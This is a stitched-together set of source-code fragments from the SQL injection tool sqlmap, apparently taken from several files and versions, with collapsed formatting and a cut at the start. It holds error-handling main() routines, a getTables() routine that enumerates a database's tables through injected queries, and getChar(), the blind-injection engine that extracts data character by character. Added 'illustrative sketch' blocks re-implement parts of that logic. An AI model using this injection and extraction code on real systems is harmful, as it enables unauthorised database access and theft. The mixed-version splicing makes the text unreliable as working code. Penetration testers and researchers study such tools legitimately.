Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: if not conf.batch: errMsg = "user quit" logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) os._exitcode = 1 raise SystemExit except KeyboardInterrupt: print() except EOFError: print() errMsg = "exit" logger.error(errMsg) except SystemExit as ex: os._exitcode = ex.code or 0 except: print() errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() valid = checkIntegrity() os._exitcode = 255 if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")): errMsg = "memory exhaustion detected" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")): errMsg = "no space left on output device" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("The paging file is too small",)): errMsg = "no space left for paging file" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")): errMsg = "permission error occurred while running Metasploit" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Permission denied", "metasploit")): errMsg = "permission error occurred while using Metasploit" logger.critical(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.critical(errMsg) raise SystemExit elif "Insufficient system resources" in excMsg: errMsg = "resource exhaustion detected" logger.critical(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.critical(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" logger.critical(errMsg) raise SystemExit elif "Invalid IPv6 URL" in excMsg: errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")): errMsg = "unable to write to the temporary directory '%s'. 
" % tempfile.gettempdir() errMsg += "Please make sure that your disk is not full and " errMsg += "that you have sufficient write permissions to " errMsg += "create temporary files and/or directories" logger.critical(errMsg) raise SystemExit elif "Permission denied: '" in excMsg: match = re.search(r"Permission denied: '([^']*)", excMsg) errMsg = "permission error occurred while accessing file '%s'" % match.group(1) logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')" logger.critical(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7. Please update accordingly " errMsg += "(Reference: 'https://bugs.python.org/issue8104')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("OSError: [Errno 22] Invalid argument: '", "importlib")): errMsg = "unable to read file '%s'" % extractRegexResult(r"OSError: \[Errno 22\] Invalid argument: '(?P<result>[^']+)", excMsg) logger.critical(errMsg) raise SystemExit elif "hash_randomization" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.3. Please update accordingly " errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")): errMsg = "there has been a problem while running the multiprocessing hash cracking. " errMsg += "Please rerun with option '--threads=1'" logger.critical(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. 
" errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.critical(errMsg) raise SystemExit elif "can't allocate read lock" in excMsg: errMsg = "there has been a problem in regular socket operation " errMsg += "('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of 'pymsql' detected (using Python3 dependencies)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")): errMsg = "wrong initialization of 'python-ntlm' detected (using Python2 syntax)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("drda", "to_bytes")): errMsg = "wrong initialization of 'drda' detected (using Python3 syntax)" logger.critical(errMsg) raise SystemExit elif "'WebSocket' object has no attribute 'status'" in excMsg: errMsg = "wrong websocket library detected" errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("window = tkinter.Tk()",)): errMsg = "there has been a problem in initialization of GUI interface " errMsg += "('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("unable to access item 'liveTest'",)): errMsg = "detected usage of files from different versions of sqlmap" logger.critical(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe",)): raise SystemExit elif valid is False: errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in "%s\n%s" % (errMsg, excMsg) for _ in ("tamper/", "waf/", "--engagement-dojo")): logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")): errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")): errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'")): errMsg = "corrupted installation detected ('%s'). 
" % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")): errMsg = "you are trying to run (hidden) development tests inside the production environment" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")): errMsg = "package 'python-ntlm' has a known compatibility issue with the " errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')" logger.critical(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" logger.critical(errMsg) raise SystemExit elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg: errMsg = "invalid runtime (\"%s\") " % excMsg.split("Error: ")[-1].strip() errMsg += "(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')" logger.critical(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" logger.critical(errMsg) raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) try: file_ = os.path.relpath(file_, os.path.dirname(__file__)) except ValueError: pass file_ = file_.replace("\\", '/') if "../" in file_: file_ = re.sub(r"(\.\./)+", '/', file_) else: file_ = file_.lstrip('/') file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if conf.get("api") or not valid: logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL)) createGithubIssue(errMsg, excMsg) finally: kb.threadContinue = False if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS: warnMsg = "your sqlmap version is outdated" logger.warn(warnMsg) if conf.get("showTime"): dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filterNone(filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))): # ignore junk files try: shutil.rmtree(kb.tempDir, ignore_errors=True) except OSError: pass if conf.get("hashDB"): conf.hashDB.flush(True) conf.hashDB.close() # NOTE: because of PyPy if conf.get("harFile"): try: with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.get("api"): conf.databaseCursor.disconnect() if conf.get("dumper"): 
conf.dumper.flush() # short delay for thread finalization _ = time.time() while threading.active_count() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() conf.disableBanner = True main()
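# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# The bulk-crawl branch of the main() above prefixes "http://" onto scheme-less
# targets and keeps going when a single target fails. A minimal sketch of that
# loop, with a hypothetical crawl() stand-in for the real crawler:

import re

def normalize_target(target):
    # same idea as the scheme check above: add http:// when no scheme is given
    if not re.search(r"(?i)\Ahttps?://", target):
        target = "http://%s" % target
    return target

def crawl_all(targets, crawl):
    results = {}
    for raw in targets:
        target = normalize_target(raw.strip())
        try:
            results[target] = crawl(target)
        except Exception as ex:
            # one bad target must not stop the whole batch
            print("problem occurred while crawling '%s' ('%s')" % (target, ex))
    return results

if __name__ == "__main__":
    print(crawl_all(["example.com", "https://example.org"], crawl=lambda url: url))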
def getTables(self, bruteForce=None): if len(kb.data.cachedTables) > 0: return kb.data.cachedTables self.forceDbmsEnum() if bruteForce is None: if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" logger.error(errMsg) bruteForce = True elif Backend.isDbms(DBMS.ACCESS): try: tables = self.getTables(False) except SqlmapNoneDataException: tables = None if not tables: errMsg = "cannot retrieve table names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True else: return tables if conf.db == CURRENT_DB: conf.db = self.getCurrentDb() if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() if conf.db: dbs = conf.db.split(',') else: dbs = self.getDbs() dbs = [_ for _ in dbs if _ and _.strip()] for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) if bruteForce: resumeAvailable = False for db, table in kb.brute.tables: if db == conf.db: resumeAvailable = True break if resumeAvailable and not conf.freshQueries: for db, table in kb.brute.tables: if db == conf.db: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [table] else: kb.data.cachedTables[conf.db].append(table) return kb.data.cachedTables message = "do you want to use common table existence check? %s " % ( "[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, ) else "[y/N/q]") choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() if choice == 'N': return elif choice == 'Q': raise SqlmapUserQuitException else: return tableExists(paths.COMMON_TABLES) infoMsg = "fetching tables for database" infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join( unsafeSQLIdentificatorNaming(unArrayizeValue(db)) for db in sorted(dbs))) logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].tables if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None if condition: if not Backend.isDbms(DBMS.SQLITE): query += " WHERE %s" % condition if conf.excludeSysDbs: infoMsg = "skipping system database%s '%s'" % ( "s" if len(self.excludeDbsList) > 1 else "", ", ".join( unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) logger.info(infoMsg) query += " IN (%s)" % ','.join( "'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) else: query += " IN (%s)" % ','.join( "'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) if len(dbs) < 2 and ("%s," % condition) in query: query = query.replace("%s," % condition, "", 1) values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): values = filter(None, arrayizeValue(values)) if len(values) > 0 and not isListLike(values[0]): values = [(dbs[0], _) for _ in values] for db, table in filterPairValues(values): db = safeSQLIdentificatorNaming(db) table = safeSQLIdentificatorNaming(unArrayizeValue(table), True) if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: kb.data.cachedTables[db].append(table) if not kb.data.cachedTables and isInferenceAvailable( ) and not conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming( db) logger.info(infoMsg) continue infoMsg = "fetching number 
of tables for " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS): query = rootQuery.blind.count else: query = rootQuery.blind.count % unsafeSQLIdentificatorNaming( db) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming( db) warnMsg += "appears to be empty" logger.warn(warnMsg) continue elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming( db) logger.warn(warnMsg) continue tables = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.SYBASE): query = rootQuery.blind.query % (db, ( kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS): query = rootQuery.blind.query % ( kb.data.cachedTables[-1] if kb.data.cachedTables else " ") elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.blind.query % index elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX): query = rootQuery.blind.query % ( index, unsafeSQLIdentificatorNaming(db)) else: query = rootQuery.blind.query % ( unsafeSQLIdentificatorNaming(db), index) table = unArrayizeValue( inject.getValue(query, union=False, error=False)) if not isNoneValue(table): kb.hintValue = table table = safeSQLIdentificatorNaming(table, True) tables.append(table) if tables: kb.data.cachedTables[db] = tables else: warnMsg = "unable to retrieve the table names " warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming( db) logger.warn(warnMsg) if isNoneValue(kb.data.cachedTables): kb.data.cachedTables.clear() if not kb.data.cachedTables: errMsg = "unable to retrieve the table names for any database" if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): kb.data.cachedTables[db] = sorted(tables) if tables else tables if kb.data.cachedTables: for db in kb.data.cachedTables.keys(): kb.data.cachedTables[db] = list(set(kb.data.cachedTables[db])) return kb.data.cachedTables
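# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# getTables() above narrows its table-listing query with an IN (...) clause
# built from the requested databases, optionally dropping system schemas first
# (conf.excludeSysDbs). A standalone sketch of that clause construction; the
# system-schema list, the quoting, and the information_schema query are only
# examples here:

SYSTEM_DBS = ("information_schema", "mysql", "performance_schema", "sys")

def build_tables_query(dbs, exclude_sys=False):
    names = sorted(db for db in dbs if db and db.strip())
    if exclude_sys:
        names = [db for db in names if db.lower() not in SYSTEM_DBS]
    in_clause = ", ".join("'%s'" % db.replace("'", "''") for db in names)
    return ("SELECT table_schema, table_name FROM information_schema.tables "
            "WHERE table_schema IN (%s)" % in_clause)

if __name__ == "__main__":
    print(build_tables_query(["shop", "mysql", "crm"], exclude_sys=True))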
                else:
                    # Run doc tests
                    # Reference: http://docs.python.org/library/doctest.html
                    (failure_count, test_count) = doctest.testmod(module)

                    if failure_count > 0:
                        retVal = False

            count += 1
            status = '%d/%d (%d%s) ' % (count, length, round(100.0 * count / length), '%')
            dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))

    clearConsoleLine()

    if retVal:
        logger.info("smoke test final result: PASSED")
    else:
        logger.error("smoke test final result: FAILED")

    return retVal

def adjustValueType(tagName, value):
    for family in optDict.keys():
        for name, type_ in optDict[family].items():
            if type(type_) == tuple:
                type_ = type_[0]

            if tagName == name:
                if type_ == "boolean":
                    value = (value == "True")
                elif type_ == "integer":
                    value = int(value)
                elif type_ == "float":
                    value = float(value)

    return value
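# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# The smoke-test tail above feeds each imported module to doctest.testmod() and
# flips the overall result on any failure. The same idea, standalone, exercised
# against this very module:

import doctest
import sys

def add(a, b):
    """
    >>> add(1, 2)
    3
    """
    return a + b

def run_doctests(modules):
    passed = True
    for module in modules:
        failure_count, _ = doctest.testmod(module, verbose=False)
        if failure_count > 0:
            passed = False
    return passed

if __name__ == "__main__":
    print("smoke test final result: %s" % ("PASSED" if run_doctests([sys.modules[__name__]]) else "FAILED"))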
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ result = tryHint(idx) if result: return result if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) originalTbl = type(charTbl)(charTbl) if continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: charTbl.remove(ord('\n')) if not charTbl: return None elif len(charTbl) == 1: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] while len(charTbl) != 1: position = (len(charTbl) >> 1) posValue = charTbl[position] if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx, posValue)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape( "'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, unescapedCharValue) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: minValue = posValue if type(charTbl) != xrange: charTbl = charTbl[position:] else: # xrange() - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if type(charTbl) != xrange: charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if continuousOrder: if maxValue == 1: return None # Going beyond the original charset elif minValue == maxChar: # If the original charTbl was [0,..,127] new one # will be [128,..,(128 << 4) - 1] or from 128 to 2047 # and instead of making a HUGE list with all the # elements we use a xrange, which is a virtual # list if expand and shiftTable: charTbl = xrange( maxChar + 1, (maxChar + 1) << shiftTable.pop()) originalTbl = xrange(charTbl) maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] else: return None else: retVal = minValue + 1 if retVal in originalTbl or ( retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if timeBasedCompare and not validateChar( idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec kb.timeValidCharsRun = 0 if retried < MAX_TIME_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: conf.timeSec += 1 warnMsg = "increasing time delay to %d second%s " % ( conf.timeSec, 's' if conf.timeSec > 1 else '') logger.warn(warnMsg) if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: dbgMsg = "turning off time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." 
% decodeIntToUnicode( retVal) logger.error(errMsg) conf.timeSec = kb.originalTimeDelay return decodeIntToUnicode(retVal) else: if timeBasedCompare: kb.timeValidCharsRun += 1 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES return decodeIntToUnicode(retVal) else: return None else: if minValue == maxChar or maxValue == minChar: return None for index in xrange(len(originalTbl)): if originalTbl[index] == minValue: break # If we are working with non-continuous elements, both minValue and character after # are possible candidates for retVal in (originalTbl[index], originalTbl[index + 1]): forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(retVal) return None
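# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# getChar() above recovers one character through repeated ">" comparisons,
# halving an ordered charset on every request. A pure-Python simulation of that
# bisection over a contiguous charset, where oracle(value) stands in for
# Request.queryPage() and answers "is the secret character code greater than
# value?":

def infer_char(oracle, charset):
    table = sorted(charset)
    while len(table) > 1:
        position = len(table) >> 1        # same midpoint choice as above
        pivot = table[position]
        if oracle(pivot):                 # secret > pivot: keep the upper half
            table = table[position:]
        else:                             # secret <= pivot: keep the lower half
            table = table[:position]
    # one candidate left; getChar() confirms it with an "=" probe, here a final
    # ">" probe disambiguates between the candidate and its successor
    return chr(table[0] + 1) if oracle(table[0]) else chr(table[0])

if __name__ == "__main__":
    secret = ord('s')
    oracle = lambda value: secret > value
    print(infer_char(oracle, range(32, 127)))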
def main(): """ Main function of sqlmap when running from command line. """ try: checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if conf.get("api"): # heavy imports from lib.utils.api import StdDbOut from lib.utils.api import setRestAPILog # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() if not conf.updateAll: # Postponed imports (faster start) if conf.profile: from lib.core.profiling import profile profile() elif conf.smokeTest: from lib.core.testing import smokeTest smokeTest() elif conf.liveTest: from lib.core.testing import liveTest liveTest() else: from lib.controller.controller import start try: start() except thread.error as ex: if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: errMsg = "user quit" try: logger.error(errMsg) except KeyboardInterrupt: pass except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) try: logger.critical(errMsg) except KeyboardInterrupt: pass raise SystemExit except KeyboardInterrupt: print errMsg = "user aborted" try: logger.error(errMsg) except KeyboardInterrupt: pass except EOFError: print errMsg = "exit" try: logger.error(errMsg) except KeyboardInterrupt: pass except SystemExit: pass except: print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() valid = checkIntegrity() try: if valid is False: errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("tamper/", "waf/")): logger.critical(errMsg) print dataToStdout(excMsg) raise SystemExit elif "MemoryError" in excMsg: errMsg = "memory exhaustion detected" logger.error(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): errMsg = "no space left on output device" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): errMsg = "corrupted installation detected ('%s'). 
" % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.error(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.error(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.error(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" logger.error(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" logger.error(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.x. Please update accordingly " errMsg += "(Reference: https://bugs.python.org/issue8104)" logger.error(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.error(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" logger.error(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". 
Please delete .pyc files on your system to fix the problem" logger.error(errMsg) raise SystemExit elif "url = url.strip()" in excMsg: dataToStdout(excMsg) print errMsg = "please contact '*****@*****.**' with details for this issue " errMsg += "as he is trying to reproduce it for long time" logger.error(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe",)): raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') file_ = re.sub(r"\.\./", '/', file_).lstrip('/') excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if conf.get("api") or not valid: logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) kb.stickyLevel = logging.CRITICAL dataToStdout(excMsg) createGithubIssue(errMsg, excMsg) except KeyboardInterrupt: pass finally: kb.threadContinue = False if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))): shutil.rmtree(kb.tempDir, ignore_errors=True) if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass if conf.get("harFile"): with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() 